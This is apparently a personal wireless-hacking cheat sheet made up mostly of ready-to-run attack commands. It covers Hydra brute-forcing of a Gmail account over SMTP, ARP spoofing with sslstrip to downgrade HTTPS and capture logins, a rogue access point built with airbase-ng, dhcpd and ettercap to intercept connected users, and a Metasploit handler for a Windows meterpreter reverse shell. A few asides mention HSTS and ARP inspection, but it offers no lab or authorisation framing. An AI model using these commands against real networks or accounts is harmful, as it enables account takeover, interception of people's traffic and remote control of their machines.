Cheatsheet Wireless hack

Bruteforce gmail

hydra -S -l xxx@gmail.com -P /pentest/password/wordlist/word.lst -e ns -V -s 465 smtp.gmai.com smtp


------------------------------------------

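SSLSTRIP (HTTPS-to-HTTP downgrade from an ARP-spoofed man-in-the-middle position; sites the browser already holds an HSTS policy for are not downgraded, and dynamic ARP inspection on the switch flags the spoofed replies)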

  echo 1 > /proc/sys/net/ipv4/ip_forward
  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

look up the gateway, then find the target

  nmap -sS -O gateway/24

  arpspoof -i wlan0 -t targetIP -r gatewayIP

new terminal
  sslstrip -l 8080

------------------------------------------

FAKE ACCESS POINT

  route n
  find gatewayIP

  apt-get install dhcp3-server

  /etc/dhcpd.conf

    >> contents:

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name "AZANA16-2";
option domain-name-servers 192.168.1.1;
range 192.168.1.2 192.168.1.40;
}


  airmon-ng
  airmon-ng start wlan0

  airbase-ng -c 11 -e AZANA16-2 mon0

 #new terminal
  ifconfig at0 192.168.1.1 netmask 255.255.255.0
  ifconfig at0 mtu 1400
  route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
  echo 1 > /proc/sys/net/ipv4/ip_forward
  iptables -t nat -A PREROUTING -p udp -j DNAT --to gatewayIP
  iptables -P FORWARD ACCEPT
  iptables --append FORWARD --in-interface at0 -j ACCEPT
  iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
  /etc/init.d/isc-dhcp-server start

  sslstrip -f -p -k 10000

 #new terminal
  ettercap -p -u -T -q -i at0


---------------------

LINUX RECIPES

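mounting samba (the command below has no mount point after the share; password= on the command line ends up in shell history and the process list, and mount.cifs also accepts credentials=<file>)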
  mount -t cifs //192.168.99.88/Public -o username=irza,password=xxx


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

===========================================
SSLSTRIP on router


echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

  gwip: gateway ip

nmap -sS -O gwip/24

  targip: target ip


arpspoof -t eth0 -t targip -r gwip

sslstrip -l 8080